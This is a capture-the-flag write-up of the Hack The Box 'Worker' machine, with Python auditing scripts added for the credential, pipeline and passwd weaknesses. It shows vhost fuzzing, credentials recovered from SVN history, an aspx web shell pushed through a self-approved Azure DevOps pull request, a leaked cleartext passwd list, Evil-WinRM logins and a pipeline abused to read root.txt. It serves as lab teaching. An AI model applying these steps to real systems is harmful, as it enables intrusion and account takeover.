HTB Worker - lmiyasato/lenny-hacking GitHub Wiki

  1. Recon stuff

    PORT     STATE SERVICE REASON
    80/tcp   open  http    syn-ack
    3690/tcp open  svn     syn-ack
    5985/tcp open  wsman   syn-ack

GoBuster on port 80 doesn't reveal anything.

Saw this on port 3690:

( success ( 2 2 ( ) ( edit-pipeline svndiff1 accepts-svndiff2 absent-entries commit-revprops depth log-revprops atomic-revprops partial-replay inherited-props ephemeral-txnprops file-revs-reverse list ) ) )

  2. Going after SVN stuff:

Checkout SVN:

kali@kali:~/Documents/HTB/worker$ svn checkout svn://10.10.10.203
Checked out revision 5.

Cat the moved.txt file:

kali@kali:~/Documents/HTB/worker$ cat moved.txt
This repository has been migrated and will no longer be maintaned here.
You can find the latest version at: http://devops.worker.htb

// The Worker team :)

Enumerate the log file:

kali@kali:~/Documents/HTB/worker$ svn log
------------------------------------------------------------------------
r5 | nathen | 2020-06-20 09:52:00 -0400 (Sat, 20 Jun 2020) | 1 line

Added note that repo has been migrated
------------------------------------------------------------------------
r4 | nathen | 2020-06-20 09:50:20 -0400 (Sat, 20 Jun 2020) | 1 line

Moving this repo to our new devops server which will handle the deployment for us
------------------------------------------------------------------------
r3 | nathen | 2020-06-20 09:46:19 -0400 (Sat, 20 Jun 2020) | 1 line

-
------------------------------------------------------------------------
r2 | nathen | 2020-06-20 09:45:16 -0400 (Sat, 20 Jun 2020) | 1 line

Added deployment script
------------------------------------------------------------------------
r1 | nathen | 2020-06-20 09:43:43 -0400 (Sat, 20 Jun 2020) | 1 line

First version
------------------------------------------------------------------------

The deployment script looks interesting, so update the working copy to revision 2 with svn up -r2 and cat the deploy.ps1 file.

kali@kali:~/Documents/HTB/worker$ svn up -r2
Updating '.':
A    deploy.ps1
Updated to revision 2.
kali@kali:~/Documents/HTB/worker$ ls
deploy.ps1  dimension.worker.htb
kali@kali:~/Documents/HTB/worker$ cat deploy.ps1 
$user = "nathen" 
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
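The deploy.ps1 above is a textbook hardcoded credential in version control: the password is a string literal that only becomes a SecureString at runtime, so every copy of the repository history carries it. As an added example (not code from the original notes), here is a small pre-commit style scanner that flags that idiom in PowerShell scripts; the sample inputs are the page's deploy.ps1 and one constructed line using the -AsPlainText variant, and the regexes and the "secret-looking" name list are assumptions.

```python
import re

# Sample 1: the deploy.ps1 recovered from SVN revision r2 on the page.
DEPLOY_PS1 = '''$user = "nathen"
$plain = "wendel98"
$pwd = ($plain | ConvertTo-SecureString)
$Credential = New-Object System.Management.Automation.PSCredential $user, $pwd
$args = "Copy-Site.ps1"
Start-Process powershell.exe -Credential $Credential -ArgumentList ("-file $args")
'''

# Sample 2: a constructed line using the other common inline-secret idiom.
INLINE_PS1 = '''$svc = New-Object PSCredential("svc_deploy", (ConvertTo-SecureString "Summer2020!" -AsPlainText -Force))
'''

ASSIGN_RE = re.compile(r'^\s*\$(?P<var>\w+)\s*=\s*"(?P<val>[^"]*)"\s*$')   # $x = "literal"
PIPE_RE = re.compile(r'\$(?P<var>\w+)\s*\|\s*ConvertTo-SecureString')      # $x | ConvertTo-SecureString
INLINE_RE = re.compile(r'ConvertTo-SecureString\s+"[^"]+"[^\n]*-AsPlainText')
SENSITIVE_RE = re.compile(r'pass|pwd|secret|token|plain|cred', re.I)       # assumed name heuristic


def find_hardcoded_credentials(script: str):
    """Return sorted (line_no, variable_or_snippet, reason) findings for a PowerShell script."""
    lines = script.splitlines()
    # Pass 1: remember every variable that is assigned a plain string literal.
    literals = {}
    for no, line in enumerate(lines, 1):
        m = ASSIGN_RE.match(line)
        if m:
            literals[m.group('var')] = no
    findings = set()
    # Pass 2: flag the ways such a literal is turned into a credential.
    for no, line in enumerate(lines, 1):
        for m in PIPE_RE.finditer(line):
            var = m.group('var')
            if var in literals:  # literal -> SecureString: the secret lives in the file
                findings.add((literals[var], var, 'string literal piped to ConvertTo-SecureString'))
        if INLINE_RE.search(line):
            findings.add((no, 'ConvertTo-SecureString', 'inline plaintext secret with -AsPlainText'))
    # Pass 3: a literal assigned to a secret-looking name is suspicious regardless of use.
    for var, no in literals.items():
        if SENSITIVE_RE.search(var):
            findings.add((no, var, 'secret-looking variable assigned a string literal'))
    return sorted(findings)


if __name__ == '__main__':
    for name, script in (('deploy.ps1', DEPLOY_PS1), ('inline.ps1', INLINE_PS1)):
        for no, what, why in find_hardcoded_credentials(script):
            print(f'{name}:{no}: {what}: {why}')
```

Run over an svn or git history (one revision at a time) this catches secrets that were "removed" in a later commit but are still retrievable, exactly as r2 was here.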

Since gobuster didn't find anything, try wfuzz for vhost fuzzing instead (--hh 703 hides the default response):

kali@kali:~/Documents/HTB/worker$ wfuzz -c -w ./bitquark-subdomains-top100000.txt -u http://10.10.10.203 -H 'Host: FUZZ.worker.htb' --hh 703
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://10.10.10.203/
Total requests: 100000

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                         
=====================================================================

000000296:   200        170 L    542 W      6495 Ch     "alpha"                                                         
000007691:   200        355 L    1408 W     16045 Ch    "story"                                                         
000022566:   401        85 L     329 W      20028 Ch    "devops"                                                        
000023339:   200        397 L    1274 W     14803 Ch    "cartoon"                                                       
000023462:   200        111 L    398 W      4971 Ch     "lens"                                                          
000024714:   200        368 L    1173 W     14588 Ch    "dimension"                                                     
000037212:   400        6 L      26 W       334 Ch      "*"                                                             
000071250:   200        274 L    871 W      10134 Ch    "twenty"                                                        
^C /usr/lib/python3/dist-packages/wfuzz/wfuzz.py:80: UserWarning:F

Add the discovered vhosts to /etc/hosts:

10.10.10.203 worker.htb alpha.worker.htb story.worker.htb devops.worker.htb cartoon.worker.htb lens.worker.htb dimension.worker.htb twenty.worker.htb

The dimension.worker.htb site also links to other vhosts, so add them to /etc/hosts as well:

solid-state.worker.htb spectral.worker.htb

Log in to devops.worker.htb with the credentials from deploy.ps1, nathen / wendel98.

Under Pipelines → Builds → Alpha CI, view the pipeline YAML. The TargetFolder line shows where each repository gets deployed, which is a likely place to land a shell.

steps:
- task: CopyFiles@2
  displayName: 'Deploy web site'
  inputs:
    SourceFolder: '$(Build.SourcesDirectory)'
    Contents: |
     **
     !.git/**/*
    TargetFolder: 'w:\sites\$(Build.Repository.Name).worker.htb'
    CleanTargetFolder: true
    OverWrite: true
  timeoutInMinutes: 5
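The weakness in this step is that everything in the repository, executable server-side files included, is copied straight into the web root of the site. As an added check (not part of the original notes or of the Worker pipeline), the Python below extracts the CopyFiles@2 step from this YAML with a deliberately small line-based parser and flags that pattern; the hardened variant, the list of IIS-executed extensions and the web-root heuristic are assumptions.

```python
import re

# The Alpha CI deployment step exactly as shown on the page (the vulnerable configuration).
PIPELINE_VULNERABLE = r"""steps:
- task: CopyFiles@2
  displayName: 'Deploy web site'
  inputs:
    SourceFolder: '$(Build.SourcesDirectory)'
    Contents: |
     **
     !.git/**/*
    TargetFolder: 'w:\sites\$(Build.Repository.Name).worker.htb'
    CleanTargetFolder: true
    OverWrite: true
  timeoutInMinutes: 5
"""

EXECUTABLE_EXTS = ("aspx", "ashx", "asmx", "asax", "config", "dll")  # assumed: files IIS would execute
# Constructed hardened variant: same step, but those file types never reach the web root.
PIPELINE_HARDENED = PIPELINE_VULNERABLE.replace(
    "     !.git/**/*\n",
    "     !.git/**/*\n" + "".join(f"     !**/*.{ext}\n" for ext in EXECUTABLE_EXTS))

WEB_ROOT_RE = re.compile(r"\\sites\\|wwwroot|inetpub", re.I)       # heuristic for "this is a web root"
CONTENTS_RE = re.compile(r"(?m)^([ \t]*)Contents:\s*\|\n((?:\1[ \t]+\S[^\n]*\n?)+)")  # block scalar body
TARGET_RE = re.compile(r"TargetFolder:\s*['\"]?([^'\"\n]+)")


def copy_tasks(yaml_text):
    """Line-based extraction of (minimatch patterns, target folder) per CopyFiles@2 step.
    Avoids a YAML library on purpose; it handles the flat step layout used in this pipeline."""
    tasks = []
    for chunk in re.split(r"(?m)^[ \t]*- task:[ \t]*", yaml_text)[1:]:
        if not chunk.startswith("CopyFiles@"):
            continue
        m_contents, m_target = CONTENTS_RE.search(chunk), TARGET_RE.search(chunk)
        patterns = [ln.strip() for ln in m_contents.group(2).splitlines()] if m_contents else []
        tasks.append((patterns, m_target.group(1).strip() if m_target else ""))
    return tasks


def audit_deploy_step(yaml_text):
    """Return human-readable findings; an empty list means the deploy step passed this check."""
    findings = []
    for patterns, target in copy_tasks(yaml_text):
        excluded = {p.rsplit(".", 1)[-1].lower() for p in patterns if p.startswith("!**/*.")}
        missing = [e for e in EXECUTABLE_EXTS if e not in excluded]
        if WEB_ROOT_RE.search(target) and "**" in patterns and missing:
            findings.append(f"{target}: copies the whole repository into a web root without "
                            f"excluding server-executable files ({', '.join(missing)})")
    return findings
```

Excluding executable types only closes this one path; the branch policy that let a single user approve and complete their own pull request still needs fixing on the project side.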

Clicking the Queue button shows that this user is permitted to start a build, so the pipeline can be used to push changes to the hosted site.

Trying to upload an aspx web shell straight to the master branch fails (it won't load there).

So create a new branch and upload it there, which succeeds.

Commit the file and create a pull request.

Add Nathalie Henley, select “1” under work items, and click “Create”.

Click on Approve --> Complete --> Complete Merge

After some enumeration, the files turn out to be deployed to w:\sites\spectral.worker.htb.

Load the aspx shell (the one by LT, in the HTB folder); after some looking around, there is a passwd file in w:\svnrepos\www\conf, shown below.

### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf. As shown in the
### example below it contains one section labelled [users].
### The name and password for each user follow, one account per line.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
noahip = player
nuahip = wkjdnw
oakhol = bxwdjhcue
owehol = supersecret
paihol = painfulcode
parhol = gitcommit
pathop = iliketomoveit
pauhor = nowayjose
payhos = icanjive
perhou = elvisisalive
peyhou = ineedvacation
phihou = pokemon
quehub = pickme
quihud = kindasecure
rachul = guesswho
raehun = idontknow
ramhun = thisis
ranhut = getting
rebhyd = rediculous
reeinc = iagree
reeing = tosomepoint
reiing = isthisenough
renipr = dummy
rhiire = users
riairv = canyou
ricisa = seewhich
robish = onesare
robisl = wolves11
robive = andwhich
ronkay = onesare
rubkei = the
rupkel = sheeps
ryakel = imtired
sabken = drjones
samken = aqua
sapket = hamburger
sarkil = friday
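The svnserve passwd format stores every password in cleartext, and this one also has a duplicated username and a password shared by two accounts, the kind of hygiene problems that make the reuse of one of these passwords for a Windows account unsurprising. As an added example (not code from the original notes), the Python below parses the [users] section and reports those issues; the sample file is a constructed excerpt of the entries shown above, and the minimum length is an assumption.

```python
from collections import defaultdict

# Constructed excerpt in svnserve passwd format, using a few of the entries shown on the page.
PASSWD_FILE = """### This file is an example password file for svnserve.
### Its format is similar to that of svnserve.conf.

[users]
nathen = wendel98
nichin = fqerfqerf
nichin = asifhiefh
robish = onesare
robisl = wolves11
ronkay = onesare
rubkei = the
"""


def parse_svnserve_passwd(text):
    """Return the [users] section as (name, password) pairs in file order.
    A list rather than a dict, so duplicate usernames survive and can be reported."""
    users, section = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):      # blank lines and '#'/'###' comments
            continue
        if line.startswith('[') and line.endswith(']'):
            section = line[1:-1].strip().lower()
        elif section == 'users' and '=' in line:
            name, password = (part.strip() for part in line.split('=', 1))
            users.append((name, password))
    return users


def audit_svnserve_passwd(text, min_length=12):
    """Flag cleartext storage, shared passwords, duplicate accounts and short passwords."""
    users = parse_svnserve_passwd(text)
    findings = []
    if users:
        findings.append(f'{len(users)} credentials stored in cleartext (the format has no hashed form)')
    by_password, seen = defaultdict(list), defaultdict(int)
    for name, password in users:
        by_password[password].append(name)
        seen[name] += 1
    for password, names in by_password.items():
        if len(names) > 1:
            findings.append(f'password shared by {", ".join(names)}')
    for name, count in seen.items():
        if count > 1:
            findings.append(f'user {name} defined {count} times; only one entry can take effect')
    for name, password in users:
        if len(password) < min_length:
            findings.append(f'user {name}: password shorter than {min_length} characters')
    return findings
```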

The credential below works with Evil-WinRM:

robisl = wolves11
evil-winrm -i 10.10.10.203 -u robisl -p wolves11

  3. On to root:

Log in to devops.worker.htb as robisl / wolves11.

Click New Pipeline --> Azure Repos Git --> Parts Unlimited --> starter pipeline

Delete the line pool: ‘Default’, because the server has no agent in that pool and the build would fail.

Replace echo Hello world! with type C:\Users\Administrator\Desktop\root.txt

Then click “Save and run” --> Create a new branch for this commit and start a pull request --> “Save and run”

Open the “Run a one-line script” step in the build log and read the output there.

Going further, it is possible to change the administrator password and then WinRM in as administrator:

kali@kali:~/Documents/HTB/worker$ evil-winrm -i 10.10.10.203 -u administrator -p Password123!

Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents>